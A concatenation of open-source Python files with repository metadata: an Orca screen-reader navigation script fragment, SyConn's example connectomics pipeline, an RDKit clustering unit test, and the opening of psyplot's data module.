and self.getCharacterAtOffset(nextObj, nextOffset + 1) == \
self.EMBEDDED_OBJECT_CHARACTER:
nextOffset += 1
[nextObj, nextOffset] = \
self.findNextCaretInOrder(nextObj, max(0, nextOffset) - 1)
if not script_settings.arrowToLineBeginning:
extents = self.getExtents(obj,
characterOffset,
characterOffset + 1)
oldX = extents[0]
for item in nextLine:
extents = self.getExtents(item[0], item[1], item[1] + 1)
newX1 = extents[0]
newX2 = newX1 + extents[2]
if newX1 < oldX <= newX2:
newObj = item[0]
newOffset = 0
text = self.utilities.queryNonEmptyText(nextObj)
if text:
newY = extents[1] + extents[3] / 2
newOffset = text.getOffsetAtPoint(oldX, newY, 0)
if newOffset >= 0:
nextOffset = newOffset
nextObj = newObj
break
if updateCache:
self._previousLineContents = self.currentLineContents
self.currentLineContents = nextLine
return [nextObj, nextOffset]
def goPreviousLine(self, inputEvent):
"""Positions the caret offset at the previous line in the document
window, attempting to preserve horizontal caret position.
Returns True if we actually moved.
"""
[obj, characterOffset] = self.getCaretContext()
[prevObj, prevCharOffset] = self.findPreviousLine(obj, characterOffset)
if not prevObj:
return False
[obj, caretOffset] = self.findFirstCaretContext(prevObj, prevCharOffset)
self.setCaretPosition(obj, caretOffset)
self.presentLine(prevObj, prevCharOffset)
return True
def goNextLine(self, inputEvent):
"""Positions the caret offset at the next line in the document
window, attempting to preserve horizontal caret position.
Returns True if we actually moved.
"""
[obj, characterOffset] = self.getCaretContext()
[nextObj, nextCharOffset] = self.findNextLine(obj, characterOffset)
if not nextObj:
return False
[obj, caretOffset] = self.findFirstCaretContext(nextObj, nextCharOffset)
self.setCaretPosition(obj, caretOffset)
self.presentLine(nextObj, nextCharOffset)
return True
def goBeginningOfLine(self, inputEvent):
"""Positions the caret offset at the beginning of the line."""
[obj, characterOffset] = self.getCaretContext()
line = self.getLineContentsAtOffset(obj, characterOffset)
obj, characterOffset = self.findFirstCaretContext(line[0][0], line[0][1])
self.setCaretPosition(obj, characterOffset)
if not isinstance(orca_state.lastInputEvent, input_event.BrailleEvent):
self.speakCharacterAtOffset(obj, characterOffset)
self.updateBraille(obj)
def goEndOfLine(self, inputEvent):
"""Positions the caret offset at the end of the line."""
[obj, characterOffset] = self.getCaretContext()
line = self.getLineContentsAtOffset(obj, characterOffset)
obj, characterOffset = line[-1][0], line[-1][2] - 1
self.setCaretPosition(obj, characterOffset)
if not isinstance(orca_state.lastInputEvent, input_event.BrailleEvent):
self.speakCharacterAtOffset(obj, characterOffset)
self.updateBraille(obj)
def goTopOfFile(self, inputEvent):
"""Positions the caret offset at the beginning of the document."""
[obj, characterOffset] = self.getTopOfFile()
self.setCaretPosition(obj, characterOffset)
self.presentLine(obj, characterOffset)
def goBottomOfFile(self, inputEvent):
"""Positions the caret offset at the end of the document."""
[obj, characterOffset] = self.getBottomOfFile()
self.setCaretPosition(obj, characterOffset)
self.presentLine(obj, characterOffset)
def expandComboBox(self, inputEvent):
"""If focus is on a menu item, but the containing combo box does not
have focus, give the combo box focus and expand it. Note that this
is necessary because with Orca controlling the caret it is possible
to arrow to a menu item within the combo box without actually giving
the containing combo box focus.
"""
[obj, characterOffset] = self.getCaretContext()
comboBox = None
if obj.getRole() == pyatspi.ROLE_MENU_ITEM:
comboBox = self.utilities.ancestorWithRole(
obj, [pyatspi.ROLE_COMBO_BOX], [pyatspi.ROLE_DOCUMENT_FRAME])
else:
index = self.getChildIndex(obj, characterOffset)
if index >= 0:
comboBox = obj[index]
if not comboBox:
return
try:
action = comboBox.queryAction()
except:
pass
else:
orca.setLocusOfFocus(None, comboBox)
comboBox.queryComponent().grabFocus()
for i in range(0, action.nActions):
name = action.getName(i)
# Translators: this is the action name for the 'open' action.
#
if name in ["open", _("open")]:
action.doAction(i)
break
def goPreviousObjectInOrder(self, inputEvent):
"""Go to the previous object in order, regardless of type or size."""
[obj, characterOffset] = self.getCaretContext()
# Work our way out of form lists and combo boxes.
#
if obj and obj.getState().contains(pyatspi.STATE_SELECTABLE):
obj = obj.parent.parent
characterOffset = self.utilities.characterOffsetInParent(obj)
self.currentLineContents = None
characterOffset = max(0, characterOffset)
[prevObj, prevOffset] = [obj, characterOffset]
found = False
mayHaveGoneTooFar = False
line = self.currentLineContents \
or self.getLineContentsAtOffset(obj, characterOffset)
startingPoint = line
useful = self.getMeaningfulObjectsFromLine(line)
while line and not found:
index = self.findObjectOnLine(prevObj, prevOffset, useful)
if not self.utilities.isSameObject(obj, prevObj):
# The question is, have we found the beginning of this
# object? If the offset is 0 or there's more than one
# object on this line and we started on a later line,
# it's safe to assume we've found the beginning.
#
found = (prevOffset == 0) \
or (len(useful) > 1 and line != startingPoint)
# Otherwise, we won't know for certain until we've gone
# to the line(s) before this one and found a different
# object, at which point we may have gone too far.
#
if not found:
mayHaveGoneTooFar = True
obj = prevObj
characterOffset = prevOffset
elif 0 < index < len(useful):
prevObj = useful[index - 1][0]
prevOffset = useful[index - 1][1]
found = (prevOffset == 0) or (index > 1)
if not found:
mayHaveGoneTooFar = True
elif self.utilities.isSameObject(obj, prevObj) \
and 0 == prevOffset < characterOffset:
found = True
if not found:
self._nextLineContents = line
prevLine = self.findPreviousLine(line[0][0], line[0][1])
line = self.currentLineContents
useful = self.getMeaningfulObjectsFromLine(line)
prevObj = useful[-1][0]
prevOffset = useful[-1][1]
if self.currentLineContents == self._nextLineContents:
break
if not found:
self.presentMessage(messages.WRAPPING_TO_BOTTOM)
[prevObj, prevOffset] = self.getBottomOfFile()
line = self.getLineContentsAtOffset(prevObj, prevOffset)
useful = self.getMeaningfulObjectsFromLine(line)
if useful:
prevObj = useful[-1][0]
prevOffset = useful[-1][1]
found = not (prevObj is None)
elif mayHaveGoneTooFar and self._nextLineContents:
if not self.utilities.isSameObject(obj, prevObj):
prevObj = useful[index][0]
prevOffset = useful[index][1]
if found:
self.currentLineContents = line
self.setCaretPosition(prevObj, prevOffset)
self.updateBraille(prevObj)
objectContents = self.getObjectContentsAtOffset(prevObj,
prevOffset)
objectContents = [objectContents[0]]
self.speakContents(objectContents)
def goNextObjectInOrder(self, inputEvent):
"""Go to the next object in order, regardless of type or size."""
[obj, characterOffset] = self.getCaretContext()
# Work our way out of form lists and combo boxes.
#
if obj and obj.getState().contains(pyatspi.STATE_SELECTABLE):
obj = obj.parent.parent
characterOffset = self.utilities.characterOffsetInParent(obj)
self.currentLineContents = None
characterOffset = max(0, characterOffset)
[nextObj, nextOffset] = [obj, characterOffset]
found = False
line = self.currentLineContents \
or self.getLineContentsAtOffset(obj, characterOffset)
while line and not found:
useful = self.getMeaningfulObjectsFromLine(line)
index = self.findObjectOnLine(nextObj, nextOffset, useful)
if not self.utilities.isSameObject(obj, nextObj):
nextObj = useful[0][0]
nextOffset = useful[0][1]
found = True
elif 0 <= index < len(useful) - 1:
nextObj = useful[index + 1][0]
nextOffset = useful[index + 1][1]
found = True
else:
self._previousLineContents = line
[nextObj, nextOffset] = self.findNextLine(line[-1][0],
line[-1][2])
line = self.currentLineContents
if self.currentLineContents == self._previousLineContents:
break
if not found:
self.presentMessage(messages.WRAPPING_TO_TOP)
[nextObj, nextOffset] = self.getTopOfFile()
line = self.getLineContentsAtOffset(nextObj, nextOffset)
useful = self.getMeaningfulObjectsFromLine(line)
if useful:
nextObj = useful[0][0]
nextOffset = useful[0][1]
found = not (nextObj is None)
if found:
self.currentLineContents = line
self.setCaretPosition(nextObj, nextOffset)
self.updateBraille(nextObj)
objectContents = self.getObjectContentsAtOffset(nextObj,
nextOffset)
objectContents = [objectContents[0]]
self.speakContents(objectContents)
def advanceLivePoliteness(self, inputEvent):
"""Advances live region politeness level."""
if _settingsManager.getSetting('inferLiveRegions'):
self.liveMngr.advancePoliteness(orca_state.locusOfFocus)
else:
self.presentMessage(messages.LIVE_REGIONS_OFF)
def monitorLiveRegions(self, inputEvent):
if not _settingsManager.getSetting('inferLiveRegions'):
_settingsManager.setSetting('inferLiveRegions', True)
self.presentMessage(messages.LIVE_REGIONS_MONITORING_ON)
else:
_settingsManager.setSetting('inferLiveRegions', False)
self.liveMngr.flushMessages()
self.presentMessage(messages.LIVE_REGIONS_MONITORING_OFF)
def setLivePolitenessOff(self, inputEvent):
if _settingsManager.getSetting('inferLiveRegions'):
self.liveMngr.setLivePolitenessOff()
else:
self.presentMessage(messages.LIVE_REGIONS_OFF)
def reviewLiveAnnouncement(self, inputEvent):
if _settingsManager.getSetting('inferLiveRegions'):
self.liveMngr.reviewLiveAnnouncement( \
int(inputEvent.event_string[1:]))
else:
self.presentMessage(messages.LIVE_REGIONS_OFF)
def toggleCaretNavigation(self, inputEvent):
"""Toggles between Firefox native and Orca caret navigation."""
if script_settings.controlCaretNavigation:
for keyBinding in self.__getArrowBindings().keyBindings:
self.keyBindings.removeByHandler(keyBinding.handler)
script_settings.controlCaretNavigation = False
string = messages.CARET_CONTROL_GECKO
else:
script_settings.controlCaretNavigation = True
for keyBinding in self.__getArrowBindings().keyBindings:
self.keyBindings.add(keyBinding)
string = messages.CARET_CONTROL_ORCA
debug.println(debug.LEVEL_CONFIGURATION, string)
self.presentMessage(string)
def speakWordUnderMouse(self, acc):
"""Determine if the speak-word-under-mouse capability applies to
the given accessible.
Arguments:
- acc: Accessible to test.
Returns True if this accessible should provide the single word.
"""
if self.inDocumentContent(acc):
try:
ai = acc.queryAction()
except NotImplementedError:
return True
        return default.Script.speakWordUnderMouse(self, acc)
|
h4ck3rm1k3/orca-sonar
|
src/orca/scripts/toolkits/Gecko/script.py
|
Python
|
lgpl-2.1
| 179,946
|
[
"ORCA"
] |
cde85454020b8b5315d6c148cf3a042744c1138973c509d2bcf2e7cb728f80fe
|
# -*- coding: utf-8 -*-
# SyConn - Synaptic connectivity inference toolkit
#
# Copyright (c) 2016 - now
# Max-Planck-Institute of Neurobiology, Munich, Germany
# Authors: Philipp Schubert, Joergen Kornfeld
import os
import glob
import shutil
import sys
import argparse
import numpy as np
from syconn import global_params
from syconn.handler.config import generate_default_conf, initialize_logging
from syconn.proc.stats import FileTimer
from knossos_utils import knossosdataset
if __name__ == '__main__':
    # parse arguments
parser = argparse.ArgumentParser(description='SyConn example run')
parser.add_argument('--working_dir', type=str, default='',
help='Working directory of SyConn')
parser.add_argument('--example_cube', type=str, default='1',
                        help='Used toy data. Either "1" (400 x 400 x 600) '
                             'or "2" (1100 x 1100 x 600).')
parser.add_argument('--log_level', type=str, default='INFO',
help='Level of logging (INFO, DEBUG).')
parser.add_argument('--overwrite', dest='overwrite', action='store_true',
help='Overwrite generated data.')
parser.add_argument('--run_server', help='Run syconn KNOSSOS server after processing.',
dest='run_server', action='store_true')
parser.add_argument('--prior_astrocyte_removal', help='Separate astrocytes from neurons.',
dest='prior_astrocyte_removal', action='store_true')
parser.set_defaults(overwrite=False, run_server=False, prior_astrocyte_removal=False)
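    # Example invocation (paths are illustrative, adjust to your checkout):
    #   python start.py --example_cube 1 --working_dir ~/SyConn/example_cube1 \
    #       --prior_astrocyte_removal
    # All boolean flags default to False (see parser.set_defaults above).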
args = parser.parse_args()
example_cube_id = int(args.example_cube)
log_level = args.log_level
if args.working_dir == "": # by default use cube dependent working dir
args.working_dir = "~/SyConn/example_cube{}/".format(example_cube_id)
example_wd = os.path.expanduser(args.working_dir) + "/"
# set up basic parameter, log, working directory and config file
experiment_name = 'j0126_example'
log = initialize_logging(experiment_name, log_dir=example_wd + '/logs/')
scale = np.array([10, 10, 20])
key_val_pairs_conf = [
('glia', {'prior_astrocyte_removal': args.prior_astrocyte_removal}),
('use_point_models', True),
('pyopengl_platform', 'egl'), # 'osmesa' or 'egl'
('batch_proc_system', None), # None, 'SLURM' or 'QSUB'
('ncores_per_node', 20),
('mem_per_node', 250000),
('ngpus_per_node', 2),
('nnodes_total', 4),
('cell_contacts',
{'generate_cs_ssv': False, # cs_ssv: contact site objects between cells
'min_path_length_partners': None,
}),
('skeleton', {'use_kimimaro': True}),
('log_level', log_level),
        # these will be created during synapse type prediction
        # (exec_dense_prediction.predict_synapsetype()); the 'paths' entry
        # below must then also be uncommented!
# ('paths', {'kd_sym': f'{example_wd}/knossosdatasets/syntype_v2/',
# 'kd_asym': f'{example_wd}/knossosdatasets/syntype_v2/'}),
('cell_objects',
{
# first remove small fragments, close existing holes, then erode to trigger watershed segmentation
'extract_morph_op': {'mi': ['binary_opening', 'binary_closing', 'binary_erosion', 'binary_erosion',
'binary_erosion'],
'sj': ['binary_opening', 'binary_closing'],
'vc': ['binary_opening', 'binary_closing', 'binary_erosion']}
}
),
('meshes', {'meshing_props_points':
{'cs_ssv': dict(depth=11, vertex_size=20, voxel_size_simplify=20),
'syn_ssv': dict(depth=11, vertex_size=20, voxel_size_simplify=20)}}
)
]
    if example_cube_id in (1, 2):
        chunk_size = (256, 256, 256)
    else:
        chunk_size = (512, 512, 256)
n_folders_fs = 100
n_folders_fs_sc = 100
for curr_dir in [os.path.dirname(os.path.realpath(__file__)) + '/',
os.path.abspath(os.path.curdir) + '/',
os.path.abspath(os.path.curdir) + '/SyConnData',
os.path.abspath(os.path.curdir) + '/SyConn',
os.path.expanduser('~/SyConnData/'),
os.path.expanduser('~/SyConn/')]:
h5_dir = curr_dir + '/data{}/'.format(example_cube_id)
if os.path.isdir(h5_dir):
break
if not os.path.isdir(h5_dir):
        raise FileNotFoundError(f'Example data folder "data{example_cube_id}" could '
                                f'not be found in any of the searched locations '
                                f'(last tried: "{curr_dir}").')
if not os.path.isfile(h5_dir + 'seg.h5') or len(glob.glob(h5_dir + '*.h5')) != 7\
or not os.path.isfile(h5_dir + 'neuron_rag.bz2'):
raise FileNotFoundError(f'Incomplete example data in folder "{h5_dir}".')
if not (sys.version_info[0] == 3 and sys.version_info[1] >= 6):
log.critical('Python version <3.6. This is untested!')
# keep imports here to guarantee the correct usage of pyopengl platform if batch processing
# system is None
from syconn.exec import exec_init, exec_syns, exec_render, exec_dense_prediction, exec_inference, exec_skeleton
from syconn.handler.compression import load_from_h5py
# PREPARE TOY DATA
generate_default_conf(example_wd, scale, key_value_pairs=key_val_pairs_conf,
force_overwrite=True)
if global_params.config.working_dir is not None and global_params.config.working_dir != example_wd:
        msg = (f'Active working directory is already set to '
               f'"{global_params.config.working_dir}", which differs from '
               f'the requested "{example_wd}". Aborting.')
log.critical(msg)
raise RuntimeError(msg)
os.makedirs(example_wd, exist_ok=True)
global_params.wd = example_wd
    log.info('Step 0/9 - Preparation')
ftimer = FileTimer(example_wd + '/.timing.pkl')
ftimer.start('Preparation')
# copy models to working directory
if os.path.isdir(curr_dir + '/models/') and not os.path.isdir(example_wd + '/models/'):
shutil.copytree(curr_dir + '/models', example_wd + '/models/')
os.makedirs(example_wd + '/glia/', exist_ok=True)
# check model existence
for mpath_key in ['mpath_spiness', 'mpath_syn_rfc', 'mpath_celltype_e3',
'mpath_axonsem', 'mpath_glia_e3', 'mpath_myelin',
'mpath_tnet']:
mpath = getattr(global_params.config, mpath_key)
if not (os.path.isfile(mpath) or os.path.isdir(mpath)):
raise ValueError('Could not find model "{}". Make sure to copy the'
' "models" folder into the current working '
'directory "{}".'.format(mpath, example_wd))
if not args.prior_astrocyte_removal:
shutil.copy(h5_dir + "/neuron_rag.bz2", global_params.config.init_svgraph_path)
else:
shutil.copy(h5_dir + "/rag.bz2", global_params.config.init_svgraph_path)
tmp = load_from_h5py(h5_dir + 'sj.h5', hdf5_names=['sj'])[0]
offset = np.array([0, 0, 0])
bd = np.array(tmp.shape)
del tmp
# INITIALIZE DATA
if not os.path.isdir(global_params.config.kd_sj_path):
kd = knossosdataset.KnossosDataset()
kd.initialize_from_matrix(global_params.config.kd_seg_path, scale, experiment_name,
offset=offset, boundary=bd, fast_downsampling=True,
data_path=h5_dir + 'raw.h5', mags=[1, 2, 4], hdf5_names=['raw'])
seg_d = load_from_h5py(h5_dir + 'seg.h5', hdf5_names=['seg'])[0].swapaxes(0, 2) # xyz -> zyx
kd.save_seg(offset=offset, mags=[1, 2, 4], data=seg_d, data_mag=1)
del kd, seg_d
kd_sym = knossosdataset.KnossosDataset()
kd_sym.initialize_from_matrix(global_params.config.kd_sym_path, scale, experiment_name,
offset=offset, boundary=bd, fast_downsampling=True,
data_path=h5_dir + 'sym.h5', mags=[1, 2], hdf5_names=['sym'])
del kd_sym
kd_asym = knossosdataset.KnossosDataset()
kd_asym.initialize_from_matrix(global_params.config.kd_asym_path, scale,
experiment_name, offset=offset, boundary=bd,
fast_downsampling=True, data_path=h5_dir + 'asym.h5',
mags=[1, 2], hdf5_names=['asym'])
del kd_asym
kd_mi = knossosdataset.KnossosDataset()
kd_mi.initialize_from_matrix(global_params.config.kd_mi_path, scale, experiment_name,
offset=offset, boundary=bd, fast_downsampling=True,
data_path=h5_dir + 'mi.h5', mags=[1, 2], hdf5_names=['mi'])
del kd_mi
kd_vc = knossosdataset.KnossosDataset()
kd_vc.initialize_from_matrix(global_params.config.kd_vc_path, scale, experiment_name,
offset=offset, boundary=bd, fast_downsampling=True,
data_path=h5_dir + 'vc.h5', mags=[1, 2], hdf5_names=['vc'])
del kd_vc
kd_sj = knossosdataset.KnossosDataset()
kd_sj.initialize_from_matrix(global_params.config.kd_sj_path, scale, experiment_name,
offset=offset, boundary=bd, fast_downsampling=True,
data_path=h5_dir + 'sj.h5', mags=[1, 2], hdf5_names=['sj'])
del kd_sj
ftimer.stop()
log.info(f'Finished example cube initialization (shape: {bd}). Starting SyConn pipeline.')
log.info('Example data will be processed in "{}".'.format(example_wd))
# START SyConn
log.info('Step 1/9 - Predicting sub-cellular structures')
ftimer.start('Dense predictions')
exec_dense_prediction.predict_myelin()
ftimer.stop()
log.info('Step 2/9 - Creating SegmentationDatasets (incl. SV meshes)')
ftimer.start('SD generation')
exec_init.init_cell_subcell_sds(chunk_size=chunk_size, n_folders_fs=n_folders_fs,
n_folders_fs_sc=n_folders_fs_sc, overwrite=args.overwrite)
exec_init.run_create_rag()
ftimer.stop()
log.info('Step 3/9 - Astrocyte separation')
if global_params.config.prior_astrocyte_removal:
ftimer.start('Astrocyte separation')
if not global_params.config.use_point_models:
exec_render.run_astrocyte_rendering()
exec_inference.run_astrocyte_prediction()
else:
exec_inference.run_astrocyte_prediction_pts()
exec_inference.run_astrocyte_splitting()
ftimer.stop()
else:
log.info('Astrocyte separation disabled. Skipping.')
log.info('Step 4/9 - Creating SuperSegmentationDataset')
ftimer.start('SSD generation')
exec_init.run_create_neuron_ssd(overwrite=args.overwrite)
ftimer.stop()
log.info('Step 5/9 - Skeleton generation')
ftimer.start('Skeleton generation')
exec_skeleton.run_skeleton_generation(map_myelin=True)
ftimer.stop()
log.info('Step 6/9 - Synapse detection')
ftimer.start('Synapse detection')
exec_syns.run_syn_generation(chunk_size=chunk_size, n_folders_fs=n_folders_fs_sc, overwrite=args.overwrite)
ftimer.stop()
log.info('Step 6.5/9 - Contact detection')
ftimer.start('Contact detection')
if global_params.config['cell_contacts']['generate_cs_ssv']:
exec_syns.run_cs_ssv_generation(n_folders_fs=n_folders_fs_sc, overwrite=args.overwrite)
else:
log.info('Cell-cell contact detection ("cs_ssv" objects) disabled. Skipping.')
ftimer.stop()
if not (global_params.config.use_onthefly_views or global_params.config.use_point_models):
log.info('Extra step - Neuron rendering')
ftimer.start('Neuron rendering')
exec_render.run_neuron_rendering()
ftimer.stop()
log.info('Step 7/9 - Compartment prediction')
ftimer.start('Compartment predictions')
exec_inference.run_semsegaxoness_prediction()
if not global_params.config.use_point_models:
exec_inference.run_semsegspiness_prediction()
exec_syns.run_spinehead_volume_calc()
ftimer.stop()
log.info('Step 8/9 - Cell-morphology embeddings')
ftimer.start('Morphology extraction')
exec_inference.run_morphology_embedding()
ftimer.stop()
log.info('Step 9/9 - Celltype analysis')
ftimer.start('Celltype analysis')
exec_inference.run_celltype_prediction()
ftimer.stop()
log.info('Step - Matrix export')
ftimer.start('Matrix export')
exec_syns.run_matrix_export()
ftimer.stop()
time_summary_str = ftimer.prepare_report()
log.info(time_summary_str)
if args.run_server:
log.info('Setting up flask server for inspection. Annotated cell reconstructions and wiring '
'can be analyzed via the KNOSSOS-SyConn plugin at '
'`SyConn/scripts/kplugin/syconn_knossos_viewer.py`.')
os.system(f'syconn.server --working_dir={example_wd} --port=10001')
|
StructuralNeurobiologyLab/SyConn
|
examples/start.py
|
Python
|
gpl-2.0
| 13,097
|
[
"NEURON"
] |
dc155c310ad810c4c19f89dac4897e757abaec5a7d3ef0d97abaf97708975ccb
|
# $Id$
#
# Copyright (C) 2001-2008 greg Landrum and Rational Discovery LLC
#
# @@ All Rights Reserved @@
# This file is part of the RDKit.
# The contents are covered by the terms of the BSD license
# which is included in the file license.txt, found at the root
# of the RDKit source tree.
#
"""unit testing code for clustering
"""
import unittest
import numpy
from rdkit.ML.Cluster import ClusterUtils
from rdkit.ML.Cluster import Clusters
from rdkit.TestRunner import redirect_stdout
from io import StringIO
from rdkit.ML.Cluster import Murtagh
class TestCase(unittest.TestCase):
def setUp(self):
# this is the data set used by Romesburg in "Cluster Analysis for Researchers"
# to demonstrate the different clustering methods
# print '\n%s: '%self.shortDescription(),
self.d = numpy.array([[10., 5.], [20., 20.], [30., 10.], [30., 15.], [5., 10.]])
self.names = ['p1', 'p2', 'p3', 'p4', 'p5']
def testDivide(self):
" tests the cluster division algorithms "
ca = Clusters.Cluster(index=1)
cb = Clusters.Cluster(index=2)
cc = Clusters.Cluster(index=3)
cd = Clusters.Cluster(index=4)
ce = Clusters.Cluster(index=5)
cf = Clusters.Cluster(index=6)
c1 = Clusters.Cluster(metric=10, children=[ca, cb], index=7)
c2 = Clusters.Cluster(metric=15, children=[cc, cd], index=8)
c3 = Clusters.Cluster(metric=20, children=[ce, cf], index=9)
c4 = Clusters.Cluster(metric=25, children=[c2, c3], index=10)
c5 = Clusters.Cluster(metric=30, children=[c4, c1], index=11)
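    # The hierarchy built above (cluster indices in parentheses, merge
    # metrics after the comma):
    #
    #               c5(11, 30)
    #              /          \
    #        c4(10, 25)     c1(7, 10)
    #        /        \       /   \
    #   c2(8, 15) c3(9, 20) ca(1) cb(2)
    #    /   \      /   \
    #  cc(3) cd(4) ce(5) cf(6)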
cs = ClusterUtils.SplitIntoNClusters(c5, 4, breadthFirst=True)
assert len(cs) == 4, 'bad split length'
indices = [x.GetIndex() for x in cs]
for index in [9, 8, 1, 2]:
assert index in indices, 'index %d not found in %s' % (index, str(indices))
# we may not want to preserve order, but test it for now
assert indices == [9, 8, 1, 2], 'bad index order'
cs2 = ClusterUtils.SplitIntoNClusters(c5, 4, breadthFirst=False)
indices = [x.GetIndex() for x in cs2]
for index in [8, 7, 5, 6]:
assert index in indices, 'index %d not found in %s' % (index, str(indices))
# we may not want to preserve order, but test it for now
assert indices == [8, 7, 5, 6], 'bad index order'
# Exceptions and edge cases
self.assertRaises(ValueError, ClusterUtils.SplitIntoNClusters, c5, len(c5) + 1)
self.assertEqual(ClusterUtils.SplitIntoNClusters(c5, len(c5)), c5.GetPoints())
self.assertEqual(ClusterUtils.SplitIntoNClusters(c5, 0), [c5])
for n in range(len(c5)):
if n >= 7: # Code fails for n = 7 and above
self.assertRaises(AssertionError, ClusterUtils.SplitIntoNClusters,
c5, n, breadthFirst=True)
else:
ClusterUtils.SplitIntoNClusters(c5, n, breadthFirst=True)
self.assertRaises(ValueError, ClusterUtils.SplitIntoNClusters, c5, len(c5) + 1,
breadthFirst=False)
self.assertEqual(
ClusterUtils.SplitIntoNClusters(c5, len(c5), breadthFirst=False), c5.GetPoints())
self.assertEqual(ClusterUtils.SplitIntoNClusters(c5, 0, breadthFirst=False), [c5])
for n in range(len(c5)):
if n >= 7: # Code fails for n = 7 and above
self.assertRaises(AssertionError, ClusterUtils.SplitIntoNClusters, c5, n,
breadthFirst=False)
else:
ClusterUtils.SplitIntoNClusters(c5, n, breadthFirst=False)
@unittest.skipIf(Murtagh.MurtaghCluster is None, "Murtagh clustering not available")
def testMurtaghUPGMA(self):
nPts = 5
sz = 5
dataP = numpy.random.random((nPts, sz))
newClust = Murtagh.ClusterData(dataP, nPts, Murtagh.UPGMA)[0]
ds = []
for i in range(nPts):
for j in range(i):
d = dataP[i] - dataP[j]
ds.append(sum(d * d))
ds = numpy.array(ds)
newClust2 = Murtagh.ClusterData(ds, nPts, Murtagh.UPGMA, isDistData=1)[0]
assert len(newClust) == len(newClust2), 'length mismatch2'
assert not newClust.Compare(newClust2, ignoreExtras=0), 'equality failed3'
newClust2 = Murtagh.ClusterData(dataP, nPts, Murtagh.UPGMA, isDistData=0)[0]
assert len(newClust) == len(newClust2), 'length mismatch2'
assert not newClust.Compare(newClust2, ignoreExtras=0), 'equality failed3'
def test_Cluster(self):
""" tests the Cluster class functionality """
root = Clusters.Cluster(index=1, position=1)
c1 = Clusters.Cluster(index=10, position=10)
c1.AddChild(Clusters.Cluster(index=30, position=30))
c1.AddChild(Clusters.Cluster(index=31, position=31))
t32 = Clusters.Cluster(index=32, position=32)
c1.AddChild(t32)
c2 = Clusters.Cluster(index=11)
# c2.AddChild(Clusters.Cluster(index=40))
# c2.AddChild(Clusters.Cluster(index=41))
c2.AddChildren([Clusters.Cluster(index=40), Clusters.Cluster(index=41)])
root.AddChild(c1)
root.AddChild(c2)
nodes = ClusterUtils.GetNodeList(root)
indices = [x.GetIndex() for x in nodes]
assert indices == [30, 31, 32, 10, 40, 41, 11, 1], 'bad indices'
subtree = root.FindSubtree(11)
self.assertEqual([x.GetIndex() for x in ClusterUtils.GetNodeList(subtree)], [40, 41, 11])
self.assertFalse(root.IsTerminal())
self.assertTrue(t32.IsTerminal())
self.assertEqual(root.GetData(), None)
root.SetData(3.14)
self.assertEqual(root.GetData(), 3.14)
self.assertEqual(root.GetMetric(), 0.0)
root.SetMetric(0.1)
self.assertEqual(root.GetMetric(), 0.1)
self.assertEqual(root.GetIndex(), 1)
root.SetIndex(100)
self.assertEqual(root.GetIndex(), 100)
self.assertEqual(root.GetPointsPositions(), [30, 31, 32, []])
root.RemoveChild(c1)
self.assertEqual([x.GetIndex() for x in ClusterUtils.GetNodeList(root)], [40, 41, 11, 100])
self.assertEqual(root.GetName(), 'Cluster(100)')
root.SetName('abc')
self.assertEqual(root.GetName(), 'abc')
f = StringIO()
with redirect_stdout(f):
root.Print(showData=True)
self.assertIn('abc', f.getvalue())
self.assertIn('Cluster(41)', f.getvalue())
self.assertIn('Metric', f.getvalue())
if __name__ == '__main__': # pragma: nocover
unittest.main()
|
ptosco/rdkit
|
rdkit/ML/Cluster/UnitTestCluster.py
|
Python
|
bsd-3-clause
| 6,718
|
[
"RDKit"
] |
2c01812618917c5121340971b0dcbca300b7b9d7b32d5ab99f4e8b605ef30897
|
from __future__ import division
import os
import os.path as osp
import inspect
from threading import Thread
from functools import partial
from glob import glob
from importlib import import_module
import re
import six
from collections import defaultdict
from itertools import chain, product, repeat, starmap, count, cycle, islice
import xarray as xr
from xarray.core.utils import NDArrayMixin
from xarray.core.formatting import first_n_items, format_item
import xarray.backends.api as xarray_api
from pandas import to_datetime
import numpy as np
import datetime as dt
import logging
from psyplot.config.rcsetup import rcParams, safe_list
from psyplot.docstring import dedent, docstrings
from psyplot.compat.pycompat import (
zip, map, isstring, OrderedDict, filter, range, getcwd,
Queue)
from psyplot.warning import PsyPlotRuntimeWarning
from warnings import warn
import psyplot.utils as utils
try:
import dask
with_dask = True
except ImportError:
with_dask = False
try:
import xarray.backends.plugins as xr_plugins
except ImportError:
xr_plugins = None # type: ignore
# No data variable. This is used for filtering if an attribute could not have
# been accessed
_NODATA = object
VARIABLELABEL = 'variable'
logger = logging.getLogger(__name__)
_ds_counter = count(1)
xr_version = tuple(map(int, xr.__version__.split('.')[:2]))
def _no_auto_update_getter(self):
""":class:`bool`. Boolean controlling whether the :meth:`start_update`
method is automatically called by the :meth:`update` method
Examples
--------
You can disable the automatic update via
>>> with data.no_auto_update:
... data.update(time=1)
... data.start_update()
To permanently disable the automatic update, simply set
>>> data.no_auto_update = True
>>> data.update(time=1)
    >>> data.no_auto_update = False  # re-enable automatic update"""
if getattr(self, '_no_auto_update', None) is not None:
return self._no_auto_update
else:
self._no_auto_update = utils._TempBool()
return self._no_auto_update
def _infer_interval_breaks(coord):
"""
>>> _infer_interval_breaks(np.arange(5))
array([-0.5, 0.5, 1.5, 2.5, 3.5, 4.5])
Taken from xarray.plotting.plot module
"""
coord = np.asarray(coord)
deltas = 0.5 * (coord[1:] - coord[:-1])
first = coord[0] - deltas[0]
last = coord[-1] + deltas[-1]
return np.r_[[first], coord[:-1] + deltas, [last]]
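# A quick check of the midpoint logic above (comment added for clarity, not
# part of the doctest): breaks sit halfway between neighbouring points and
# are linearly extrapolated at both ends, e.g.
# _infer_interval_breaks(np.array([0., 1., 3.])) -> array([-0.5, 0.5, 2., 4.])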
def _get_variable_names(arr):
"""Return the variable names of an array"""
if VARIABLELABEL in arr.dims:
return arr.coords[VARIABLELABEL].tolist()
else:
return arr.name
def _get_dims(arr):
"""Return all dimensions but the :attr:`VARIABLELABEL`"""
return tuple(filter(lambda d: d != VARIABLELABEL, arr.dims))
def _open_store(store_mod, store_cls, fname):
try:
return getattr(import_module(store_mod), store_cls).open(fname)
except AttributeError:
return getattr(import_module(store_mod), store_cls)(fname)
def _fix_times(dims):
# xarray 0.16 fails with pandas 1.1.0 for datetime, see
# https://github.com/pydata/xarray/issues/4283
for key, val in dims.items():
if np.issubdtype(np.asarray(val).dtype, np.datetime64):
dims[key] = to_datetime(val)
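# Illustration (assumed input): calling
#   _fix_times({'time': np.array(['2020-01-01'], dtype='datetime64[ns]')})
# replaces the value with a pandas DatetimeIndex in place.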
@docstrings.get_sections(base='setup_coords')
@dedent
def setup_coords(arr_names=None, sort=[], dims={}, **kwargs):
"""
Sets up the arr_names dictionary for the plot
Parameters
----------
